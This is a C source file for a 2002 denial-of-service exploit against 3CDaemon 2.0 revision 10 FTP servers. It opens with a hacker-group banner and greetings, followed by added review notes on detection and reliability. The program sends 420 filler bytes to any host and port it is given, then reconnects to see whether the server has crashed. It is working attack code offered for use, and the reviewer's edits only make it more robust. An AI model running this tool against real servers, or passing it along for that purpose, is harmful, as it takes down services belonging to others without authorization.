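/* MaD SKiLL 'H'
 * MsH 4 life! http://www.madskill.tk
 * *Private Release*
 *
 * 3CDaemon 2.0 revision 10 DoS
 *
 * 11:12 14-4-2002: BOF flaw found by skyrim
 * 1:00 15-4-2002: exploit done.
 * 23:31 16-4-2002: Edited the exploit slightly, it's a better code now
 *
 * This program will exploit the buffer overflow vulnerability of
 * 3CDaemon 2.0 FTP servers. Sending 400+ chars will make the server crash
 * at any time they're sent.
 *
 * Tested on:
 * [OS] [version]
 * Windows XP (5.1 - 2600) 3CDaemon 2.0 revision 10
 *
 * ###
 * ##### #### ##
 * ###### ###### ######
 * ###### ######## ######## ######## ######
 * ###### ####### ### ########### ######## #######
 * ###### ######## #### ############ ######## #######
 * ############### ##### ############ ####### #######
 * ############## ###### ############ ####### #######
 * ############## ####### ########### ###### #######
 * ############# ######## ### ######## ###### #########
 * ############ ### #### ### ####### #################
 * ##### ############### ########## #################
 * ### ######### ##### ######### ################
 * #### ######### ##### ######### ################
 * ### ######### ############# ################
 * ## ######### ###### ###### #######
 * ### #### ###### #######
 * ###### ########
 * ###### ########
 * #### ## ###### ### ### ### ###### ########
 * ####### ######## ### #### ##### ##### #######
 * ############### ### #### ##### ##### #######
 * ####### ######## #### ##### ## ###
 * ###### ######### #### #### #####
 * ##### ######## #### #### ####
 * ###### ######## #### #### ### #### ##
 * ########## ### #### #### ########## ######
 * ######### ### ###########################
 * ########## ######## #####################
 * ############# ###### ########## ##########
 * ######## ##### #### ### ### ### ###
 *
 * I don't know if this will work on versions other than the one I tested it on.
 * Have fun.
 *
 * Crew shouts go to: MsH, DFA, uDc
 * Personal shouts to: mannie, primus, amok, torment, talented, warsteam, frodo, maxxo,
 * xo|l, fearless, cybje, kell, frodo, maxxo, and everyone else.
 *
 * skyrim (skyrim@m4dskill.tk)
 */

/*
 * Review notes:
 *
 * - Per the code below, the program connects to host:port, writes BOFSIZE
 *   bytes of 'A' with no FTP command and no line terminator, closes the
 *   socket, waits five seconds and attempts a second TCP connect.
 * - The header states the crash threshold as "400+ chars"; the page does
 *   not say which server-side buffer is overrun or whether the overflow is
 *   controllable beyond a crash.
 * - The liveness check is weak evidence. Any failure of the second
 *   connect() (filtering, connection limits, a slow restart) prints the
 *   "died" message, so confirm the outcome from the service's process state
 *   or event log on the host under test.
 * - Detection: several hundred identical bytes on the FTP control channel
 *   before any command is an easy anomaly for a network sensor to flag.
 * - The page names no fixed version; it lists only 3CDaemon 2.0 revision 10
 *   as tested. Treat other builds as unverified rather than as safe.
 */

#include <errno.h>
#include <netdb.h>
#include <netinet/in.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <unistd.h>

#define BOFSIZE 420

/* Print the tool banner to stdout. */
static void banner(void)
{
    printf("MaD SKiLL 'H' 3CDaemon 2.0 revision 10 DoS\n.:[MsH]:.\n ---\n");
}

/*
 * Report msg followed by the text for the current errno, then exit(1).
 * Only call this right after a failing call that sets errno.
 */
static void E(const char *msg)
{
    perror(msg);
    exit(1);
}

/*
 * Parse a decimal TCP port from text into *port (host byte order).
 * Returns 0 on success, -1 if text is not a whole number in 1..65535.
 */
static int parse_port(const char *text, uint16_t *port)
{
    char *end = NULL;
    long value;

    errno = 0;
    value = strtol(text, &end, 10);
    if (end == text || *end != '\0' || errno == ERANGE)
        return -1;
    if (value < 1 || value > 65535)
        return -1;

    *port = (uint16_t)value;
    return 0;
}

/*
 * Usage: <prog> hostname/ip port
 *
 * Sends BOFSIZE filler bytes to the given TCP endpoint, then probes whether
 * the endpoint still accepts connections. Exits 1 on usage, lookup or
 * socket errors; exits 0 after printing either verdict.
 */
int main(int argc, char *argv[])
{
    static char ownage[BOFSIZE];
    struct sockaddr_in server_addr;
    struct hostent *server;
    uint16_t port;
    int sockfd, sockfd2;
    ssize_t n;

    if (argc != 3) {
        fprintf(stderr, "Usage: %s hostname/ip port\n", argv[0]);
        exit(1);
    }

    /* atoi() accepted garbage and silently produced port 0. */
    if (parse_port(argv[2], &port) != 0) {
        fprintf(stderr, "Invalid port: %s\n", argv[2]);
        exit(1);
    }

    banner();

    /* The buffer is filled completely and carries no NUL terminator. */
    memset(ownage, 'A', sizeof ownage);

    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd < 0)
        E("Error occured during opening socket");

    server = gethostbyname(argv[1]);
    if (server == NULL) {
        /* gethostbyname() reports through h_errno, not errno, so perror()
         * would print an unrelated error here. */
        fprintf(stderr, "Error occured during host lookup -No such host?-\n");
        exit(1);
    }

    /* Only an IPv4 answer fits sin_addr; refuse anything else instead of
     * copying h_length bytes blindly. */
    if (server->h_addrtype != AF_INET ||
        server->h_length != (int)sizeof server_addr.sin_addr ||
        server->h_addr_list[0] == NULL) {
        fprintf(stderr, "Error occured during host lookup -No such host?-\n");
        exit(1);
    }

    memset(&server_addr, 0, sizeof server_addr);
    server_addr.sin_family = AF_INET;
    memcpy(&server_addr.sin_addr, server->h_addr_list[0],
           sizeof server_addr.sin_addr);
    server_addr.sin_port = htons(port);

    printf("Connecting to target FTP server... ");
    if (connect(sockfd, (struct sockaddr *)&server_addr,
                sizeof server_addr) < 0)
        E("Error occured during connecting");

    printf("Connected, Probing BOF... \n");

    /* Length comes from the array size: strlen() on this unterminated
     * buffer would read past its end. */
    n = write(sockfd, ownage, sizeof ownage);
    if (n < 0)
        E("Error occured during writing to socket");
    close(sockfd);

    sockfd2 = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd2 < 0)
        E("Error occured during opening socket");

    printf("Done, checking if server is dead.. \n");
    sleep(5);

    /* Any connect() failure is reported as a crash; see the review notes
     * above for why that verdict needs independent confirmation. */
    if (connect(sockfd2, (struct sockaddr *)&server_addr,
                sizeof server_addr) < 0) {
        printf("Couldn't establish connection: It seems like it died! =)\n");
        close(sockfd2);
        exit(0);
    }

    close(sockfd2);
    printf("Server is still alive. Perhaps its not vulnerable?\n");
    return 0;
}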